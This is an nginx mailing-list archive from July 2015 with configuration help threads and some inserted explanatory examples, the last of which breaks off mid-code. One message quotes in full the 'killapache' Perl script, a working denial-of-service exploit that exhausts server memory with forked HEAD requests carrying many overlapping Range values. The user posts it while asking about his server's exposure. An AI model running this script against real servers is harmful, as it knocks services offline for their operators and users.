        rewrite ^/([^/]*)/([^/]*)/([^/]*)/([^/]*)\.html$ /page.php?parentcategorie=$1&categorie=$2&fx=$3&img=$4 break;
        try_files $uri $uri/ =404;
    }
}

From reallfqq-nginx at yahoo.fr Sat Jul 18 18:02:17 2015
From: reallfqq-nginx at yahoo.fr (B.R.)
Date: Sat, 18 Jul 2015 20:02:17 +0200
Subject: Conditional access log formatting ?
In-Reply-To: <55AA2C6D.8090106@list-subs.com>
References: <55AA2C6D.8090106@list-subs.com>
Message-ID:

I suggest you use the 'if' parameter of 2 access_log directives (>v1.7.0), combined with 2 maps with reversed logic.
---
B. R.

On Sat, Jul 18, 2015 at 12:37 PM, Ben wrote:

> Hi,
>
> I'm using haproxy in front of some NGINX instances, but only for some
> instances which are being load balanced by haproxy, there are other
> instances which go straight through.
>
> I realise I need to change the logging format in NGINX to enable
> X-Forwarded-For in the access logs.
>
> The question is whether I can conditionally format the logs, i.e. use
> "X-Forwarded-For" if it exists, otherwise use the normal NGINX logging
> format.
>
> I've had a quick peek at the manual, I'm thinking maybe this can be done
> with a map of some sort ? Maybe there's a better way ? To be honest I've
> no idea where to start, and I've never used maps before anyway !

From stainwash.dev at gmail.com Sun Jul 19 16:02:14 2015
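The suggestion in the "Conditional access log formatting" reply above (two access_log directives gated by if=, driven by two maps with reversed logic), written out as an added example; it is not configuration posted by anyone in the thread. The format name, the map variable names, the log path and the trailing peer= field are assumptions.

```nginx
# Added example, not from the thread. Assumed names: "proxied",
# $log_proxied, $log_direct, and the log path.
http {
    # Fields of the built-in "combined" format, with the address taken
    # from X-Forwarded-For. The connecting peer is appended as peer=
    # so the entry still records who actually opened the connection.
    log_format proxied '$http_x_forwarded_for - $remote_user [$time_local] '
                       '"$request" $status $body_bytes_sent '
                       '"$http_referer" "$http_user_agent" '
                       'peer=$remote_addr';

    # 1 when the request carries X-Forwarded-For, 0 when it does not.
    map $http_x_forwarded_for $log_proxied {
        ""      0;
        default 1;
    }

    # Reversed logic: 1 only when the header is absent.
    map $http_x_forwarded_for $log_direct {
        ""      1;
        default 0;
    }

    server {
        listen 80;

        # A request is not logged by a directive whose if= value is "0"
        # or empty, so each request produces exactly one entry, in the
        # format that matches how it arrived.
        access_log /var/log/nginx/access.log combined if=$log_direct;
        access_log /var/log/nginx/access.log proxied  if=$log_proxied;
    }
}
```

X-Forwarded-For is supplied by whoever sends the request, so on an instance that is also reachable without haproxy a client can set it itself; the peer= field is what lets such an entry be told apart from one forwarded by the load balancer.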
From: stainwash.dev at gmail.com (murali kumar)
Date: Sun, 19 Jul 2015 21:32:14 +0530
Subject: Subdomain configuration problem
Message-ID:

Hi,

I'm a beginner in nginx, and I have searched Google and the mailing list but no luck.

my nginx.conf:

http{
    server{
        listen 80;
        server_name example.com www.example.com;
        location / {
            proxy_pass http://127.0.0.1:aaaa/;
        }
    }
    server{
        listen 80;
        server_name subdomain.example.com;
        location / {
            proxy_pass http://127.0.0.1:bbbb/;
        }
    }
    #rest of the default config like access log, etc
}

Problem is after adding server block for subdomain, both requests (example.com, subdomain.example.com) load only example.com in the browser.
If I place the subdomain server block first, both requests (example.com, subdomain.example.com) load subdomain.example.com in the browser.

Please suggest what could be the problem.

Thanks in Advance!!

From mdounin at mdounin.ru Mon Jul 20 03:14:14 2015
From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 20 Jul 2015 06:14:14 +0300 Subject: Subdomain configuration problem In-Reply-To: References: Message-ID: <20150720031414.GF87067@mdounin.ru> Hello! On Sun, Jul 19, 2015 at 09:32:14PM +0530, murali kumar wrote: > Hi, > > I'm beginner in nginx, and i have searched google and mailing list but no > luck. > > my nginx.conf: > > http{ > server{ > listen 80; > server_name example.com www.example.com; > location / { > proxy_pass http://127.0.0.1:aaaa/; > } > } > server{ > listen 80; > server_name subdomain.example.com; > location / { > proxy_pass http://127.0.0.1:bbbb/; > } > } > #rest of the default config like acces log, etc > } > > > > Problem is after adding server block for subdomain, both request ( > example.com, subdomain.example.com) loading only example.com in browser. > If i place subdomain server block listing as first one, both request ( > example.com, subdomain.example.com) loading subdomain.example.com in > browser. > > Please suggest me what could be the problem. Likely reason is a typo in the domain name as listen in the "server_name" directives. -- Maxim Dounin http://nginx.org/ From stainwash.dev at gmail.com Mon Jul 20 12:13:42 2015 
From: stainwash.dev at gmail.com (murali kumar)
Date: Mon, 20 Jul 2015 17:43:42 +0530
Subject: Subdomain configuration problem
In-Reply-To: <20150720031414.GF87067@mdounin.ru>
References: <20150720031414.GF87067@mdounin.ru>
Message-ID:

Can't believe!! You are right. Thanks for the suggestion.

On Mon, Jul 20, 2015 at 8:44 AM, Maxim Dounin wrote:

> Hello!
>
> On Sun, Jul 19, 2015 at 09:32:14PM +0530, murali kumar wrote:
>
> > Hi,
> >
> > I'm beginner in nginx, and i have searched google and mailing list but no
> > luck.
> >
> > my nginx.conf:
> >
> > http{
> >     server{
> >         listen 80;
> >         server_name example.com www.example.com;
> >         location / {
> >             proxy_pass http://127.0.0.1:aaaa/;
> >         }
> >     }
> >     server{
> >         listen 80;
> >         server_name subdomain.example.com;
> >         location / {
> >             proxy_pass http://127.0.0.1:bbbb/;
> >         }
> >     }
> >     #rest of the default config like acces log, etc
> > }
> >
> > Problem is after adding server block for subdomain, both request (
> > example.com, subdomain.example.com) loading only example.com in browser.
> > If i place subdomain server block listing as first one, both request (
> > example.com, subdomain.example.com) loading subdomain.example.com in
> > browser.
> >
> > Please suggest me what could be the problem.
>
> Likely reason is a typo in the domain name as listen in the
> "server_name" directives.
>
> --
> Maxim Dounin
> http://nginx.org/

From vbart at nginx.com Mon Jul 20 12:48:47 2015
From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 20 Jul 2015 15:48:47 +0300 Subject: Conditional access log formatting ? In-Reply-To: <55AA2C6D.8090106@list-subs.com> References: <55AA2C6D.8090106@list-subs.com> Message-ID: <1619898.nlKE7gvPRW@vbart-workstation> On Saturday 18 July 2015 11:37:33 Ben wrote: > Hi, > > I'm using haproxy infront of some NGINX instances, but only for some > instances which are being loadbalanced by haproxy, there are other > instances which go straight through. > > I realise I need to change the logging format in NGINX to enable > X-Forwarded-For in the access logs. > > The question is whether I can conditionally format the logs, i.e. use > "X-Forwarded-For" if it exists, otherwise use the normal NGINX logging > format. > > I've had a quick peek at the manual, I'm thinking maybe this can be done > with a map of some sort ? Maybe there's a better way ? To be honest > I've no idea where to start, and I've never used maps before anyway ! > You should use the realip module: http://nginx.org/en/docs/http/ngx_http_realip_module.html wbr, Valentin V. Bartenev From vbart at nginx.com Mon Jul 20 15:07:39 2015 
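Why the realip approach suggested in the reply above is safer than logging X-Forwarded-For whenever the header is present, as an added sketch (not from the thread and not nginx code): it models the selection rule that the realip directives `set_real_ip_from`, `real_ip_header` and `real_ip_recursive` express. The function name and all addresses are constructed for illustration.

```python
import ipaddress


def _parse_ip(text):
    """Return an ip_address object, or None if text is not an IP literal."""
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def client_ip_for_log(peer, xff, trusted_proxies, recursive=True):
    """Pick the address to log for one request (hypothetical helper).

    peer            -- address of the TCP peer (what nginx sees as the client)
    xff             -- raw X-Forwarded-For value, or None if absent
    trusted_proxies -- CIDR strings, the role set_real_ip_from plays
    recursive       -- skip trusted hops from the right, the role
                       real_ip_recursive plays
    """
    nets = [ipaddress.ip_network(n) for n in trusted_proxies]

    def trusted(ip):
        return ip is not None and any(ip in net for net in nets)

    # A header sent by an untrusted peer is client-controlled: ignore it.
    if not xff or not trusted(_parse_ip(peer)):
        return peer

    hops = [_parse_ip(h) for h in xff.split(",") if h.strip()]
    if not hops or any(h is None for h in hops):
        return peer  # malformed header: fall back to the peer address

    if not recursive:
        return str(hops[-1])  # last entry, appended by the nearest proxy
    for hop in reversed(hops):
        if not trusted(hop):
            return str(hop)  # rightmost address that is not a known proxy
    return str(hops[0])  # every hop is a trusted proxy


# Constructed sample requests: (peer, X-Forwarded-For) pairs.
HAPROXY = ["10.0.0.5/32"]
SAMPLES = [
    ("203.0.113.9", "1.2.3.4"),               # direct client forging the header
    ("10.0.0.5", "198.51.100.7"),             # via haproxy
    ("10.0.0.5", "1.2.3.4, 198.51.100.7"),    # via haproxy, forged first entry
    ("203.0.113.9", None),                    # direct client, no header
]

if __name__ == "__main__":
    for peer, xff in SAMPLES:
        print(peer, repr(xff), "->", client_ip_for_log(peer, xff, HAPROXY))
```

A log format keyed only on the presence of the header would record `1.2.3.4` for the first sample; restricting trust to the load balancer's address records the real peer.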
From: vbart at nginx.com (Valentin V. Bartenev)
Date: Mon, 20 Jul 2015 18:07:39 +0300
Subject: Problem with nginx + uwsgi
In-Reply-To:
References:
Message-ID: <2154833.ntoxBUQ3yS@vbart-workstation>

On Friday 17 July 2015 09:09:22 Guido wrote:
> Hi everybody,
>
> I'm having a problem with my nginx and uwsgi. I don't really know what
> I'm doing wrong.
>
> Here is the configuration of nginx:
>
> server {
>     listen 80;
>
>     location /api/v1 {
>         uwsgi_pass unix:///tmp/api.sock;
>         include uwsgi_params;
>     }
>
>     location / {
>         return 444;
>     }
>
> And this is uwsgi configuration:
>
> [uwsgi]
> socket = /tmp/api.sock
> chdir = /var/www/api
> master = true
> plugin = python
> pp = /home/api/src
> file = uwsgi.py
> uid = www-data
> gid = www-data
> threads = 4
> workers = 4
> callable = app
> chmod-socket = 666
> post-buffering = 4096
> virtualenv = /usr/local/venvs/api
> callable = ins
> env = API_SETTINGS_FILE=../../etc/settings.py
>
> If I execute following command everything seems to be working fine:
>
> curl -v http://127.0.0.1/api/v1/login
>
> {
>   "message": "Method Not Allowed",
>   "status": 405
> }
>
> HTTP/405 it's the expected answer since the app doesn't allow login
> requests with GET method, So now I'm going to try with POST.
>
> The application expects for data such as email and password, so this should
> trigger a 500 in the api backend
>
> curl http://10.10.10.35/api/v1/login -X POST
>
> uwsgi log:
>
> [pid: 19484|app: 0|req: 5/5] 127.0.0.1 () {30 vars in 340 bytes} [Fri Jul
> 17 12:05:00 2015] POST /api/v1/login => generated 0 bytes in 432 msecs
> (HTTP/1.1 500) 0 headers in 0 bytes (0 switches on core 0)
[..]

You should look what exactly is returned from your backend.
From the log above it looks like it returns nothing.

To shed some light you can enable the debug log in nginx:
http://nginx.org/en/docs/debugging_log.html

wbr, Valentin V. Bartenev

From nginx-forum at nginx.us Tue Jul 21 19:33:13 2015
From: nginx-forum at nginx.us (smuthali) Date: Tue, 21 Jul 2015 15:33:13 -0400 Subject: Nginx 1.8 proxying to Netty - timeout from upstream Message-ID: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> I have setup Nginx proxy to a Netty server. I am seeing a timeout from upstream, i.e. Netty. The consequence of this timeout is that the JSON payload response is truncated (as seen on browser developer tools) 2015/07/21 05:08:56 [error] 6#0: *19 upstream prematurely closed connection while reading upstream, client: 198.147.191.15, server: sbox-wus-ui.cloudapp.net, request: "GET /api/v1/entities/DEVICE HTTP/1.1", upstream: "http://10.0.3.4:8080/api/v1/entities/DEVICE", host: "sbox-wus-ui.cloudapp.net", referrer: "https://sbox-wus-ui.cloudapp.net/home.html" So, yes I initially thought that this is a Netty issue. However, when I make the same API call on Netty I am able to the retrieve the full JSON payload. The JSON response message size is about 13k. The JSON response I see on the Nginx side is 10K. After spending some time reading up on the Nginx configuration parameters, I added client_body_temp and proxy_temp but to no avail. Any help is really appreciated. 
Nginx details: nginx version: nginx/1.8.0 built by gcc 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic' ----- # For more information on configuration, see: # * Official English Documentation: http://nginx.org/en/docs/ # * Official Russian Documentation: http://nginx.org/ru/docs/ user nginx; worker_processes 1; daemon off; error_log {{logDir}}/error.log; pid /run/nginx.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log {{logDir}}/access.log main; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; chunked_transfer_encoding off; # Disable constraints on potential 
large uploads resulting in HTTP 413 # client_max_body_size 0; #gzip on; index index.html index.htm; upstream netty { {% for netty in servers %} server {{netty}}; {% endfor %} } # Load modular configuration files from the /etc/nginx/conf.d directory. # See http://nginx.org/en/docs/ngx_core_module.html#include # for more information. include /etc/nginx/conf.d/*.conf; server { listen 80; server_name {{serverName}}; rewrite ^ https://$server_name$request_uri? permanent; } server { listen 443 ssl; server_name {{serverName}}; ssl_certificate /data/nginx/cert/{{crtFile}}; ssl_certificate_key /data/nginx/cert/{{keyFile}}; root /usr/share/nginx/html; #charset koi8-r; #access_log /var/log/nginx/host.access.log main; # Load configuration files for the default server block. include /etc/nginx/default.d/*.conf; #The only resource available to check health location /health { root /apps/nginx/f2; index index.html; } location / { client_body_buffer_size 128k; client_body_temp_path /apps/nginx/client_body_temp; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; proxy_temp_path /apps/nginx/proxy_temp; root /apps/nginx/f2; index index.html; {% if basicAuth == "true" %} auth_basic "Restricted"; auth_basic_user_file /data/nginx/cert/htpasswd; {% endif %} } location /ui/ { proxy_pass http://netty; {% if basicAuth == "true" %} auth_basic "Restricted"; auth_basic_user_file /data/nginx/cert/htpasswd; {% endif %} } location /api/ { proxy_pass http://netty; } location /sales/ { root /apps/nginx/f2; index index.html; {% if basicAuth == "true" %} auth_basic "Restricted"; auth_basic_user_file /data/nginx/cert/htpasswd; {% endif %} } # redirect server error pages to the static page /40x.html # error_page 404 /404.html; location = /40x.html { } # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { } } } 
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260455,260455#msg-260455 From nginx-forum at nginx.us Wed Jul 22 04:43:09 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 00:43:09 -0400 Subject: Fetching a string by parsing URL Message-ID: I have a web server sitting behind Nginx. If there is an error, then I want to fetch some information from the url and pass it on to a static file as parameters. I have configured Nginx to fetch the query parameters from the url using $arg_param_name. However, I also need to fetch a String from the url path itself. For instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval", how can I parse this url to fetch the last path (path2 in this case)? My location directive is as below: location ~*/path1/{ ... } The url, however, need not always have the same number of paths. It can also have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e the path which is immediately followed by the query parameters (the ? symbol). Is it possible to do this using Nginx directly? Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260458#msg-260458 From me at myconan.net Wed Jul 22 04:55:30 2015 
From: me at myconan.net (Edho Arief)
Date: Wed, 22 Jul 2015 13:55:30 +0900
Subject: Fetching a string by parsing URL
In-Reply-To:
References:
Message-ID:

On Jul 22, 2015 11:43, "sudharshanr" wrote:
>
> I have a web server sitting behind Nginx. If there is an error, then I want
> to fetch some information from the url and pass it on to a static file as
> parameters. I have configured Nginx to fetch the query parameters from the
> url using $arg_param_name.
>
> However, I also need to fetch a String from the url path itself. For
> instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval ",
> how can I parse this url to fetch the last path (path2 in this case)? My
> location directive is as below:
>
> location ~*/path1/{
> ...
> }
>
> The url, however, need not always have the same number of paths. It can also
> have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e
> the path which is immediately followed by the query parameters (the ?
> symbol). Is it possible to do this using Nginx directly?
>

this?

/([^/]+/?)$

> Thanks.
>
> Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260458#msg-260458

From nginx-forum at nginx.us Wed Jul 22 06:17:48 2015
From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 02:17:48 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <30c01d700548e9ba013aa4afacf32982.NginxMailingListEnglish@forum.nginx.org> Edho Arief: Thanks, but I think I need to rephrase my question. Right now, my nginx.conf looks like this: location ~*/path1/{ if (-f $document_root/error503.html) { return 503; } } error_page 503 ?arg1=$arg_queryparam1&arg2= As you can see, if there is a 503 error, then I return a static file. The arguments to the static file are 1. the param from url whose name is queryparam1, 2. the last path from the url Now how do I fetch the last path from the url and pass it as a param to the static file? I'm new to Nginx, so I might not have understood what you meant. Or is what I'm doing completely wrong? Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260461#msg-260461 From lists at ruby-forum.com Wed Jul 22 09:26:11 2015 
From: lists at ruby-forum.com (Puneeth Kumar) Date: Wed, 22 Jul 2015 11:26:11 +0200 Subject: proxy_pass redirection Message-ID: Hi, I'm new to Nginx and we are using for reverse proxy. I'm able to configured Nginx and it's working but I've challenge in configuring it for Dynamic proxy_pass. I've tried to use wild characters in proxy_pass it's not working, please help. E.G. location server { #listen 443; listen 8080; #server_name analyticstest.isyntax.net; server_name IP; /api/ingestion/ { proxy_set_header HOST $host; proxy_set_header X-Real-IP $remote_addr; proxy_buffers 8 512k; proxy_buffer_size 2024k; proxy_busy_buffers_size 2024k; proxy_read_timeout 3000; add_header Cache-Control no-cache; #rewrite ^/api/query/(.*)$ /$1; proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX; (IP: hostname of the server where the service system) In my case, in the above link last word NGINEX can be any other name, so how I can dynamically configure for that word. I tried using wild characters like *, . & _ are not working. Please help. Thank you -- Posted via http://www.ruby-forum.com/. From pchychi at gmail.com Wed Jul 22 12:18:42 2015 
From: pchychi at gmail.com (Payam Chychi)
Date: Wed, 22 Jul 2015 05:18:42 -0700
Subject: proxy_pass redirection
In-Reply-To:
References:
Message-ID: <32730A860F0E4A7099C66F0C96B92EB3@gmail.com>

On Wednesday, July 22, 2015 at 2:26 AM, Puneeth Kumar wrote:
> Hi,
> I'm new to Nginx and we are using for reverse proxy.
>
> I'm able to configured Nginx and it's working but I've challenge in
> configuring it for Dynamic proxy_pass. I've tried to use wild characters
> in proxy_pass it's not working, please help.
>
> E.G.
> location
> server {
> #listen 443;
> listen 8080;
> #server_name analyticstest.isyntax.net;
> server_name IP;
>
> /api/ingestion/ {
> proxy_set_header HOST $host;
> proxy_set_header X-Real-IP $remote_addr;
> proxy_buffers 8 512k;
> proxy_buffer_size 2024k;
> proxy_busy_buffers_size 2024k;
> proxy_read_timeout 3000;
> add_header Cache-Control no-cache;
> #rewrite ^/api/query/(.*)$ /$1;
> proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX; (IP:
> hostname of the server where the service
> system)
>
> In my case, in the above link last word NGINEX can be any other name, so
> how I can dynamically configure for that word.
> I tried using wild characters like *, . & _ are not working. Please
> help.
>
> Thank you
>
> --
> Posted via http://www.ruby-forum.com/.

Hi,
Add a cookie to the session and have the back end route to proper path post cookie check

From pchychi at gmail.com Wed Jul 22 12:21:39 2015
From: pchychi at gmail.com (Payam Chychi)
Date: Wed, 22 Jul 2015 05:21:39 -0700
Subject: Fetching a string by parsing URL
In-Reply-To:
References:
Message-ID:

On Tuesday, July 21, 2015 at 9:43 PM, sudharshanr wrote:
> I have a web server sitting behind Nginx. If there is an error, then I want
> to fetch some information from the url and pass it on to a static file as
> parameters. I have configured Nginx to fetch the query parameters from the
> url using $arg_param_name.
>
> However, I also need to fetch a String from the url path itself. For
> instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval",
> how can I parse this url to fetch the last path (path2 in this case)? My
> location directive is as below:
>
> location ~*/path1/{
> ...
> }
>
> The url, however, need not always have the same number of paths. It can also
> have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e
> the path which is immediately followed by the query parameters (the ?
> symbol). Is it possible to do this using Nginx directly?
>
> Thanks.
>
> Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260458#msg-260458

Regex match
Might work here?

From nginx-forum at nginx.us Wed Jul 22 17:08:55 2015
From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 13:08:55 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <77968d2aafd1fabe3a529517f50f5def.NginxMailingListEnglish@forum.nginx.org> I think I need to rephrase my question. Right now, my nginx.conf looks like this: location ~*/path1/{ if (-f $document_root/error503.html) { return 503; } } error_page 503 ?arg1=$arg_queryparam1&arg2= As you can see, if there is a 503 error, then I return a static file. The arguments to the static file are: 1. the param from url whose name is queryparam1, 2. the last path from the url Now how do I fetch the last path from the url and pass it as a param to the static file? I'm new to Nginx, so I'm not sure if I'm doing this right. Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260479#msg-260479 From nginx-forum at nginx.us Wed Jul 22 17:48:31 2015 From: nginx-forum at nginx.us (rms) Date: Wed, 22 Jul 2015 13:48:31 -0400 Subject: How to run nginx unit tests? Message-ID: <959ad17460f530675c208f54d8581a99.NginxMailingListEnglish@forum.nginx.org> Hello .. I just built and installed nginx on my Linux system. Are there any unit/smoke/regression tests available to test the install? Thanks for your help. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260481,260481#msg-260481 From mdounin at mdounin.ru Wed Jul 22 17:55:30 2015 
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Wed, 22 Jul 2015 20:55:30 +0300
Subject: How to run nginx unit tests?
In-Reply-To: <959ad17460f530675c208f54d8581a99.NginxMailingListEnglish@forum.nginx.org>
References: <959ad17460f530675c208f54d8581a99.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150722175530.GB1500@mdounin.ru>

Hello!

On Wed, Jul 22, 2015 at 01:48:31PM -0400, rms wrote:

> Hello .. I just built and installed nginx on my Linux system. Are there any
> unit/smoke/regression tests available to test the install?

Our test suite is available at http://hg.nginx.org/nginx-tests/.
It is designed for developers though, not for end users.

--
Maxim Dounin
http://nginx.org/

From me at myconan.net Wed Jul 22 18:11:27 2015
From: me at myconan.net (Edho Arief)
Date: Thu, 23 Jul 2015 03:11:27 +0900
Subject: Fetching a string by parsing URL
In-Reply-To: <77968d2aafd1fabe3a529517f50f5def.NginxMailingListEnglish@forum.nginx.org>
References: <77968d2aafd1fabe3a529517f50f5def.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

On Thu, Jul 23, 2015 at 2:08 AM, sudharshanr wrote:
> I think I need to rephrase my question. Right now, my nginx.conf looks like
> this:
>
> location ~*/path1/{
>     if (-f $document_root/error503.html) {
>         return 503;
>     }
> }
>
> error_page 503 ?arg1=$arg_queryparam1&arg2= from url>
>
> As you can see, if there is a 503 error, then I return a static file. The
> arguments to the static file are:
> 1. the param from url whose name is queryparam1,
> 2. the last path from the url
>
> Now how do I fetch the last path from the url and pass it as a param to the
> static file? I'm new to Nginx, so I'm not sure if I'm doing this right.
>

map $uri $last_path {
  ~/(?<pathname>[^/]+)/?$ $pathname;
}

server {
  ...
  error_page ... ...=$last_path;
}

Note that nothing will see the arguments if the error page is just a
static file and not a redirect.

From nginx-forum at nginx.us Wed Jul 22 18:16:00 2015
From: nginx-forum at nginx.us (TASM) Date: Wed, 22 Jul 2015 14:16:00 -0400 Subject: Doubt about killapache attack on nginx server Message-ID: <2e0de4c63a418eac02e00ddba0b8bd4f.NginxMailingListEnglish@forum.nginx.org> Hi, I am running nginx 1.0.11 standalone. Recently someone told me that my server is vulnerable to apache killer attack because when he run the following script, it shows "host seems vuln". I searched on this forum and found that "First of all, nginx doesn't favor HEAD requests with compression, so the exact mentioned attack doesn't work against a standalone nginx installation." Also, I checked the source file "src/http/modules/ngx_http_range_filter_module.c", I think it should have been patched to prevent handling malicious range requests. Any idea why it still shows "host seems vuln"? Thanks a lot! ----------------------------------------------------------------- killapache script --------------------------------------------------------------- use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: 
gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); }

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260485,260485#msg-260485

From nginx-forum at nginx.us Wed Jul 22 18:53:04 2015
From: nginx-forum at nginx.us (rms)
Date: Wed, 22 Jul 2015 14:53:04 -0400
Subject: How to run nginx unit tests?
In-Reply-To: <20150722175530.GB1500@mdounin.ru>
References: <20150722175530.GB1500@mdounin.ru>
Message-ID: <13e58dd89ea7af362132361ed037ebed.NginxMailingListEnglish@forum.nginx.org>

Thanks Maxim. So from end user's perspective is there something I can do to test the validity of build/install?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260481,260489#msg-260489

From karljohnson.it at gmail.com Wed Jul 22 21:50:12 2015
From: karljohnson.it at gmail.com (Karl Johnson)
Date: Wed, 22 Jul 2015 17:50:12 -0400
Subject: Tweak fastcgi_buffer
Message-ID:

Hello,

I need to tweak fastcgi_buffer to 1m on a website that has heavy requests to avoid buffer. If I use a distro with 4096 pagesize, is it better to do 256x 4k or 4x 256k?

[root at web ~]# getconf PAGESIZE
4096
[root at web ~]#

fastcgi_buffer_size 4k;
fastcgi_buffers 256 4k;

OR

fastcgi_buffer_size 256k;
fastcgi_buffers 4 256k;

Thanks!

Karl

From mdounin at mdounin.ru Wed Jul 22 21:55:12 2015
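The probe in the "Doubt about killapache attack on nginx server" message above only looks for "Partial" in the reply to a Range request, which does not show how a server treats large overlapping range sets. The following added example (not from the thread and not nginx source; the `max_ranges` default and the byte-budget rule are assumptions of this sketch) shows the kind of server-side check that decides between a 206, a plain 200 and a 416 for a given Range header.

```python
import re

# One byte-range-spec: "first-last", "first-" or "-suffix".
_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(value):
    """Parse 'bytes=a-b,c-,-n' into [(first, last), ...].

    first/last are ints or None. Returns None when the set is malformed,
    including any spec whose last position is below its first.
    """
    unit, sep, spec_set = value.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    specs = []
    for raw in spec_set.split(","):
        m = _SPEC.match(raw.strip())
        if not m or not (m.group(1) or m.group(2)):
            return None
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        if first is not None and last is not None and last < first:
            return None
        specs.append((first, last))
    return specs


def resolve(specs, length):
    """Clamp specs to a body of `length` bytes; drop unsatisfiable ones."""
    spans = []
    if length <= 0:
        return spans
    for first, last in specs:
        if first is None:                       # suffix form: last n bytes
            if last == 0:
                continue
            spans.append((max(length - last, 0), length - 1))
        elif first < length:
            end = length - 1 if last is None else min(last, length - 1)
            spans.append((first, end))
    return spans


def range_verdict(value, length, max_ranges=4):
    """Return (verdict, reason) for one Range header value.

    verdict is 'partial' (answer 206), 'full' (ignore the header, answer
    200) or 'unsatisfiable' (answer 416).
    """
    specs = parse_byte_ranges(value)
    if specs is None:
        return ("full", "malformed range set")
    if len(specs) > max_ranges:
        return ("full", "too many ranges")
    spans = resolve(specs, length)
    if not spans:
        return ("unsatisfiable", "no range inside the body")
    requested = sum(end - start + 1 for start, end in spans)
    if requested > length:
        return ("full", "ranges add up to more than the body")
    return ("partial", "%d range(s)" % len(spans))


# Constructed header values; the body length of 1000 bytes is arbitrary.
SAMPLES = ["bytes=0-", "bytes=0-499", "bytes=0-,5-0,5-1,5-2",
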